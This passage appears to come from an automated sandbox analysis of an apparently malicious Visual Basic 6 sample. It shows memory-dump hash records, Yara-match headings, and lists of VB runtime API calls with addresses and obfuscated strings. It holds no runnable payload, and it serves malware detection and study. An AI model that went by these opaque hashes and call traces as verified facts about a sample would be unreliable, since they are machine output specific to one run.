                      • Opcode Fuzzy Hash: 429c93c9ec36d744488bb57ceedf9e37d58cf322fe309f28675a9618fe7898a5
                      • Instruction Fuzzy Hash: 67412371504705CEFF259E38C4643AA72A1EF55328F75422BD94387661CB7CC9829BCB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 553ebce58c56197a0904ca99e464cc616e962ec477bcdab5dcee523955cc698d
                      • Instruction ID: 562bd732e4efed8b5abbf591de2f06df899f50203a9619e92b67e4ae3f4cca02
                      • Opcode Fuzzy Hash: 553ebce58c56197a0904ca99e464cc616e962ec477bcdab5dcee523955cc698d
                      • Instruction Fuzzy Hash: E75147B1908354DBEB245E2489987EB77A5EF59310F11011FEC4A972A2C7388E408B4A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0138e182bb28480f7493defa3b2832b11a3f0ab396729c955e35aa3cfa1fc415
                      • Instruction ID: 2225ef54d8bc5ddb15e85114c866f0eafc11d5a590243de450192fc68b5e8c7a
                      • Opcode Fuzzy Hash: 0138e182bb28480f7493defa3b2832b11a3f0ab396729c955e35aa3cfa1fc415
                      • Instruction Fuzzy Hash: 3F41E272A04394AFDB308F698C883EEB7AAAF88710F56412BEC09D7310D7B44F458655
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c2a1f518e088fbcaf8eacf38503ad66f9b4bf970989de6f608e7efd1847d230
                      • Instruction ID: 0653601ab4cffb6a27676b871814876fb26d92e1cc123b77b7acb579c237f1c0
                      • Opcode Fuzzy Hash: 6c2a1f518e088fbcaf8eacf38503ad66f9b4bf970989de6f608e7efd1847d230
                      • Instruction Fuzzy Hash: 1F41BD726043889BDB308F6A8C887EFB7AAEF98710F56411BEC49D7210D3B45F459A51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c801af1d2e250d7527638c888270b1d81684145bb56631a4b416afd71f84c94a
                      • Instruction ID: 67e1e61a1d6b183960f20f5eb3931be5700750da9f331dc17d4146aef53664d6
                      • Opcode Fuzzy Hash: c801af1d2e250d7527638c888270b1d81684145bb56631a4b416afd71f84c94a
                      • Instruction Fuzzy Hash: 103164300087C29AF722CB39C84979FBFA0AF42304F54C28FD88846456C3BA5289C79B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a44ba4f166f35322544baee8d92d58747d79c3439fce76bda3aa93562e316699
                      • Instruction ID: 6c55dbff5d235a8803de7317daf3f2c62a0890d89b79c041c927b8886a9b584e
                      • Opcode Fuzzy Hash: a44ba4f166f35322544baee8d92d58747d79c3439fce76bda3aa93562e316699
                      • Instruction Fuzzy Hash: 1D2126314087C65AF762CB39C80979FBFA1AF46354F45C2CFC8854645AC3BA129AC797
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4d0acf13aa71927383a9ef9f4362214d189c48187ad16dfa240a83eccead345e
                      • Instruction ID: 37901886f94d7041a27d119ad6daf1178a3b579d1fe54b07e978cb238289e358
                      • Opcode Fuzzy Hash: 4d0acf13aa71927383a9ef9f4362214d189c48187ad16dfa240a83eccead345e
                      • Instruction Fuzzy Hash: 5F213172A193599BDB308F698D843EBB3EAAB5C711F06401FEC49D7200E3744A449A42
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 725a3c6f657457857139bea965f3816cbf8eaee6d7e2afa19dc761299f8ee9e8
                      • Instruction ID: a72b99e56672374eb94a7ca469d693a9db39598d7c26267ecdbf0b69f5649e36
                      • Opcode Fuzzy Hash: 725a3c6f657457857139bea965f3816cbf8eaee6d7e2afa19dc761299f8ee9e8
                      • Instruction Fuzzy Hash: F3216072A1A3589BDF704F798DC43EFB3AAAB5C700F06402FEC4AD7200E7340A489641
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22aa8e86cb12f5d7a4ac713c5dd02952a374365dd2ffe857b9029bbbd85341aa
                      • Instruction ID: 58a0571fa3bb9c79bfbf6183bda6559f9d553f9bbc3747c298d4ebe5d2be191a
                      • Opcode Fuzzy Hash: 22aa8e86cb12f5d7a4ac713c5dd02952a374365dd2ffe857b9029bbbd85341aa
                      • Instruction Fuzzy Hash: 4E2157778012988FFF70CE298C207DBB6A6AFE5710F52811B9C8927314C3744E468B96
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f26192db30540d340bab0c3354c8b4285e412feda3a26d0ca98d67eb50de43c
                      • Instruction ID: 2b0672f284524c1abcdf6f1070a224c01e14db81fd70b9dcac68e20d45aad828
                      • Opcode Fuzzy Hash: 7f26192db30540d340bab0c3354c8b4285e412feda3a26d0ca98d67eb50de43c
                      • Instruction Fuzzy Hash: 6A2127778012A4CBEF70CE658C547DBB6A6AFA9710F92851BDC4937314C3708D468B96
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8e9aadebf066f4b1b9f6bca57a5dbffea95d17b2e4288f4bf7a6ed361e26f47f
                      • Instruction ID: 4d1c4765e83c2812c387033110190a7595f1e8cc8728af062cf7337e14ae3221
                      • Opcode Fuzzy Hash: 8e9aadebf066f4b1b9f6bca57a5dbffea95d17b2e4288f4bf7a6ed361e26f47f
                      • Instruction Fuzzy Hash: FB1136779021A4CBEF74CE758C406DBB6A6AFA5700F52852BDC8937314C3744D498B96
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6fc41ce22f17f858530d718ad3f9b8703b356f2aa1406ca0c725e294cb95f53
                      • Instruction ID: 56ce721224aeecd3ad0e0b757ebafbfada549a2448e07bbcde9332c839ad802b
                      • Opcode Fuzzy Hash: d6fc41ce22f17f858530d718ad3f9b8703b356f2aa1406ca0c725e294cb95f53
                      • Instruction Fuzzy Hash: 5B11DA200087C655F353CB3DC5097AFFEA16F42354F95C3CE88854685AD7BA5259C397
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ebaa6feebfd0e4c96ad64ddc3e4c7d10a409ac27daf8626b8a93521f5ff3a89
                      • Instruction ID: ae1d180624ef75ac2b1f8dcc76bad91d46ca9e81b2998c158517a9105d1b2928
                      • Opcode Fuzzy Hash: 7ebaa6feebfd0e4c96ad64ddc3e4c7d10a409ac27daf8626b8a93521f5ff3a89
                      • Instruction Fuzzy Hash: 69F0A070544609CBFBB0DFB28945BDF77E2FF85244F91814A984992125D278418B8B97
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89059449d702ab570167fe92af2a2c813564f41d7c79d7b8040bbda494485742
                      • Instruction ID: 3a015d318135ecd4958477d88fc0e71a9a986344098b64f181eb580b3192b7d8
                      • Opcode Fuzzy Hash: 89059449d702ab570167fe92af2a2c813564f41d7c79d7b8040bbda494485742
                      • Instruction Fuzzy Hash: E4F01CB2204501CFEB24CF04C5C4FABB3A2BB95710F65405EE8458B365C338ED42EB1A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 618d655a74973492dec4daa1209dc1b54dd6df729a7c612f1c7d579f1f7540a6
                      • Instruction ID: d9e73f4973d7ea0501f7c57f54d6aca64b994125ab7ce0d6c04485b60d416376
                      • Opcode Fuzzy Hash: 618d655a74973492dec4daa1209dc1b54dd6df729a7c612f1c7d579f1f7540a6
                      • Instruction Fuzzy Hash: C6C09B74251542CFFE95CA19C194F5173F0BF45B40F1114D6E842CB711C318DC01E645
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a8a15db9c6f8bd85a8d045e592066712a603a4c9c6e4f11067f08a430b7207a
                      • Instruction ID: fad3fc80867583e5e00d83bfccf1461c82e8c1aa063124ea056e7600a9962161
                      • Opcode Fuzzy Hash: 2a8a15db9c6f8bd85a8d045e592066712a603a4c9c6e4f11067f08a430b7207a
                      • Instruction Fuzzy Hash: D8B092F62026818FFB41DF08C492B0073B0FB11A88B080490E402CB712C224E910CA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420A63
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420A82
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B50,00000134), ref: 00420AC7
                      • __vbaFreeObj.MSVBVM60 ref: 00420AD4
                      • __vbaLenBstrB.MSVBVM60(00403EA8), ref: 00420ADF
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 00420B01
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 00420B26
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000138), ref: 00420B4F
                      • __vbaFreeObj.MSVBVM60 ref: 00420B54
                      • #690.MSVBVM60(Godset,Fourpounder,Nittenaarigt4,FILMDOM), ref: 00420B6E
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420B87
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420BA0
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403BAC,00000120), ref: 00420BC3
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420BD8
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420BF1
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B74,00000130), ref: 00420C14
                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00420C22
                      • __vbaI4Var.MSVBVM60(00000000), ref: 00420C2C
                      • __vbaInStr.MSVBVM60(00000000,?,PETHER,00000000), ref: 00420C40
                      • __vbaFreeStr.MSVBVM60 ref: 00420C4F
                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00420C5F
                      • __vbaFreeVar.MSVBVM60 ref: 00420C6B
                      • __vbaStrCat.MSVBVM60(00403F64,00403F58,00000002), ref: 00420C85
                      • __vbaStrMove.MSVBVM60 ref: 00420C96
                      • __vbaInStr.MSVBVM60(00000000,00403F64,00000000), ref: 00420CA0
                      • __vbaFreeStr.MSVBVM60 ref: 00420CB3
                      • #703.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00420CD4
                      • __vbaStrMove.MSVBVM60 ref: 00420CDF
                      • __vbaFreeVar.MSVBVM60 ref: 00420CEA
                      • __vbaStrCat.MSVBVM60(00403F80,15:15:), ref: 00420CF6
                      • __vbaStrMove.MSVBVM60 ref: 00420D01
                      • #541.MSVBVM60(00000002,00000000), ref: 00420D08
                      • __vbaStrVarMove.MSVBVM60(00000002), ref: 00420D12
                      • __vbaStrMove.MSVBVM60 ref: 00420D1D
                      • __vbaFreeStr.MSVBVM60 ref: 00420D22
                      • __vbaFreeVar.MSVBVM60 ref: 00420D27
                      • #580.MSVBVM60(Diaphysial,00000001), ref: 00420D30
                      • __vbaFreeStr.MSVBVM60(00420D78), ref: 00420D70
                      • __vbaFreeStr.MSVBVM60 ref: 00420D75
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresultMove$New2$#541#580#690#703BstrCallLateList
                      • String ID: ~R$15:15:$Afgiftsperioderne3$Diaphysial$FILMDOM$Fourpounder$Godset$Nittenaarigt4$PETHER
                      • API String ID: 132566401-2934692065
                      • Opcode ID: 9694ee7de29fbcb86fd65a011085db46a56452407ec42bdaefa9ba35b054fe6c
                      • Instruction ID: 0406fbe539f3ea0ab513257deae6569ff52f6ac3ae3b50e256214ff09ae4ec71
                      • Opcode Fuzzy Hash: 9694ee7de29fbcb86fd65a011085db46a56452407ec42bdaefa9ba35b054fe6c
                      • Instruction Fuzzy Hash: 5E917171A00215AFDB14EFA4DE89FDE7BB8EF48705F10412AF501B72E1DA74A905CB68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaStrCopy.MSVBVM60 ref: 0041FBC1
                      • __vbaHresultCheckObj.MSVBVM60(00000000,004018A8,004033A8,00000114), ref: 0041FBEA
                      • __vbaHresultCheckObj.MSVBVM60(00000000,004018A8,004033A8,00000110), ref: 0041FC13
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041FC31
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041FC56
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000110), ref: 0041FC7C
                      • __vbaStrMove.MSVBVM60 ref: 0041FC8B
                      • __vbaFreeObj.MSVBVM60 ref: 0041FC94
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041FCAD
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041FCD2
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000130), ref: 0041FCF8
                      • __vbaStrMove.MSVBVM60 ref: 0041FD07
                      • __vbaFreeObj.MSVBVM60 ref: 0041FD10
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041FD29
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD42
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B30,00000128), ref: 0041FD69
                      • _adj_fdiv_m64.MSVBVM60 ref: 0041FD8E
                      • __vbaFpI4.MSVBVM60(43540000,?,42500000), ref: 0041FDBF
                      • __vbaHresultCheckObj.MSVBVM60(00000000,004018A8,004033A8,000002C0,?,42500000), ref: 0041FDFE
                      • __vbaFreeObj.MSVBVM60(?,42500000), ref: 0041FE03
                      • #538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 0041FE16
                      • #557.MSVBVM60(?), ref: 0041FE20
                      • __vbaFreeVar.MSVBVM60(?,42500000), ref: 0041FE3D
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041FE5B
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041FE80
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000D8), ref: 0041FEA6
                      • __vbaStrMove.MSVBVM60 ref: 0041FEBB
                      • __vbaFreeObj.MSVBVM60 ref: 0041FEC0
                      • #535.MSVBVM60 ref: 0041FEC6
                      • __vbaVarDup.MSVBVM60 ref: 0041FEE2
                      • #667.MSVBVM60(?), ref: 0041FEEC
                      • __vbaStrMove.MSVBVM60 ref: 0041FEF7
                      • __vbaFreeVar.MSVBVM60 ref: 0041FEFC
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041FF11
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FF2A
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403BE0,00000078), ref: 0041FF4B
                      • __vbaFreeObj.MSVBVM60 ref: 0041FF56
                      • __vbaFreeStr.MSVBVM60(0041FFA0), ref: 0041FF89
                      • __vbaFreeStr.MSVBVM60 ref: 0041FF8E
                      • __vbaFreeStr.MSVBVM60 ref: 0041FF93
                      • __vbaFreeStr.MSVBVM60 ref: 0041FF98
                      • __vbaFreeStr.MSVBVM60 ref: 0041FF9D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresult$New2$Move$#535#538#557#667Copy_adj_fdiv_m64
                      • String ID: ~R$Udstyringer4
                      • API String ID: 551562340-1152142833
                      • Opcode ID: 008e25373a1c27b3dea89cfc20576aa38596cfb5da770e3f86f1d13a2c440969
                      • Instruction ID: e40667c81948b9b4ddf1d1c10265d91da5e10a0c2963173d3821267610a6c809
                      • Opcode Fuzzy Hash: 008e25373a1c27b3dea89cfc20576aa38596cfb5da770e3f86f1d13a2c440969
                      • Instruction Fuzzy Hash: 76C18470A00219ABCB14DFA4DD88EDE7BB8FF48705F108526F505B71B1DB74A946CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaStrCat.MSVBVM60(00403D48,00403D40), ref: 0041F348
                      • __vbaStrMove.MSVBVM60 ref: 0041F355
                      • __vbaStrCat.MSVBVM60(00403D50,00000000), ref: 0041F35D
                      • __vbaStrMove.MSVBVM60 ref: 0041F364
                      • __vbaFreeStr.MSVBVM60 ref: 0041F36F
                      • #514.MSVBVM60(?,00000002), ref: 0041F377
                      • __vbaStrMove.MSVBVM60 ref: 0041F382
                      • __vbaStrCmp.MSVBVM60(00403D50,00000000), ref: 0041F38A
                      • __vbaFreeStr.MSVBVM60 ref: 0041F39D
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041F3BA
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041F3E5
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000E8), ref: 0041F413
                      • __vbaStrMove.MSVBVM60 ref: 0041F424
                      • __vbaFreeObj.MSVBVM60 ref: 0041F429
                      • #536.MSVBVM60(?), ref: 0041F43E
                      • __vbaStrMove.MSVBVM60 ref: 0041F449
                      • __vbaFreeVar.MSVBVM60 ref: 0041F44E
                      • #570.MSVBVM60(00000010), ref: 0041F456
                      • __vbaStrCat.MSVBVM60(00403D60,00403D58), ref: 0041F47C
                      • #632.MSVBVM60(?,?,00000002,00000002), ref: 0041F49A
                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041F4BF
                      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 0041F4D6
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041F4FA
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041F51F
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000C8), ref: 0041F548
                      • __vbaFreeObj.MSVBVM60 ref: 0041F54D
                      • #613.MSVBVM60(00000002,00000008), ref: 0041F566
                      • __vbaStrVarMove.MSVBVM60(00000002), ref: 0041F570
                      • __vbaStrMove.MSVBVM60 ref: 0041F57B
                      • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 0041F58A
                      • __vbaFileOpen.MSVBVM60(00000020,000000FF,000000B4,kombinationsuddannelse), ref: 0041F5A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$FreeMove$CheckHresult$ListNew2$#514#536#570#613#632FileOpen
                      • String ID: kombinationsuddannelse
                      • API String ID: 2582689820-1354069041
                      • Opcode ID: bf847d65b6020f4a12a00229036e1d7ea2253aba349e20fa4d110f64e801ae0b
                      • Instruction ID: 5a34a86923ac96ebe0f2e1e2ed926c6dcf3d643503e6705b2e8f722a2fbb10a5
                      • Opcode Fuzzy Hash: bf847d65b6020f4a12a00229036e1d7ea2253aba349e20fa4d110f64e801ae0b
                      • Instruction Fuzzy Hash: AA916E71D00218ABCB10DFA4DD89EEEBBB8FF58701F10412AE505B72A1DB745949CFA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • #610.MSVBVM60(?), ref: 0041F68A
                      • #610.MSVBVM60(?), ref: 0041F690
                      • __vbaVarAdd.MSVBVM60(?,?,?,00000001,00000001), ref: 0041F6B5
                      • #662.MSVBVM60(?,00403D9C,?,00000000), ref: 0041F6C9
                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041F6EA
                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041F705
                      • #536.MSVBVM60(?), ref: 0041F726
                      • __vbaStrMove.MSVBVM60 ref: 0041F731
                      • __vbaFreeVar.MSVBVM60 ref: 0041F73A
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041F752
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041F777
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000118), ref: 0041F7A4
                      • __vbaI2I4.MSVBVM60 ref: 0041F7B0
                      • __vbaFreeObj.MSVBVM60 ref: 0041F7B9
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041F7E4
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F7FD
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C38,00000180), ref: 0041F827
                      • __vbaLateMemCall.MSVBVM60(?,cvJmrvNfRhBzOP3gU202,00000003), ref: 0041F89F
                      • __vbaFreeObj.MSVBVM60 ref: 0041F8AB
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041F8C4
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F8DD
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B50,00000134), ref: 0041F926
                      • __vbaFreeObj.MSVBVM60 ref: 0041F92F
                      • __vbaFreeStr.MSVBVM60(0041F978), ref: 0041F968
                      • __vbaFreeObj.MSVBVM60 ref: 0041F971
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresult$New2$#610$#536#662CallLateListMove
                      • String ID: ~R$Subfreshman$cvJmrvNfRhBzOP3gU202
                      • API String ID: 214454802-1494275381
                      • Opcode ID: 1cb7da89f4094e33f83857f0a027f2ef5a93b4a29be5c70d278844971156d477
                      • Instruction ID: 63939e5bab10449c1c6f03a4c5bfd91aa6348c14f3b55b0390778504d953dfc8
                      • Opcode Fuzzy Hash: 1cb7da89f4094e33f83857f0a027f2ef5a93b4a29be5c70d278844971156d477
                      • Instruction Fuzzy Hash: EFA13DB1900218AFCB14DFA5DA49ADEFBB8FF48300F10816AE549B72A1D7746A45CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaStrCat.MSVBVM60(00403E28,00403E28), ref: 004201BC
                      • #513.MSVBVM60(?,?,00000002), ref: 004201D6
                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 004201F2
                      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 00420205
                      • #610.MSVBVM60(00000008), ref: 0042021B
                      • #552.MSVBVM60(?,00000008,00000001), ref: 0042022B
                      • __vbaVarMove.MSVBVM60 ref: 00420237
                      • __vbaFreeVar.MSVBVM60 ref: 00420246
                      • #703.MSVBVM60(00000008,000000FF,000000FE,000000FE,000000FE), ref: 00420262
                      • __vbaStrMove.MSVBVM60 ref: 0042026D
                      • __vbaFreeVar.MSVBVM60 ref: 00420276
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0042028A
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,0000004C), ref: 004202AF
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B8C,0000002C), ref: 004202F9
                      • __vbaFreeObj.MSVBVM60 ref: 00420302
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0042031B
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420334
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B50,00000090), ref: 0042035B
                      • __vbaFreeObj.MSVBVM60 ref: 0042036A
                      • __vbaFreeStr.MSVBVM60(004203AB), ref: 0042039B
                      • __vbaFreeVar.MSVBVM60 ref: 004203A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresult$MoveNew2$#513#552#610#703List
                      • String ID: ~R
                      • API String ID: 1404482011-4090886994
                      • Opcode ID: 5e4214437e4516cc83f32d667ce99974f238617823f200f0d97f482ab1097732
                      • Instruction ID: 446a0602c1153549ed71e5be28ddf62d232014d1b1f22edcbf499bd21c1f7e2d
                      • Opcode Fuzzy Hash: 5e4214437e4516cc83f32d667ce99974f238617823f200f0d97f482ab1097732
                      • Instruction Fuzzy Hash: 70611670900218EFCB14DFA4DD89EAEBBB8FF48701F20862AE505B72A1DBB45945CF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaStrCopy.MSVBVM60 ref: 00420593
                      • #538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 004205A6
                      • #557.MSVBVM60(?), ref: 004205B0
                      • __vbaFreeVar.MSVBVM60 ref: 004205C7
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 004205E8
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0042060D
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000D8), ref: 00420637
                      • __vbaStrMove.MSVBVM60 ref: 0042064C
                      • __vbaFreeObj.MSVBVM60 ref: 00420651
                      • #535.MSVBVM60 ref: 00420657
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420672
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042068B
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B9C,00000050), ref: 004206AC
                      • #667.MSVBVM60(?), ref: 004206C6
                      • __vbaStrMove.MSVBVM60 ref: 004206D1
                      • __vbaFreeObj.MSVBVM60 ref: 004206D6
                      • __vbaFreeVar.MSVBVM60 ref: 004206DF
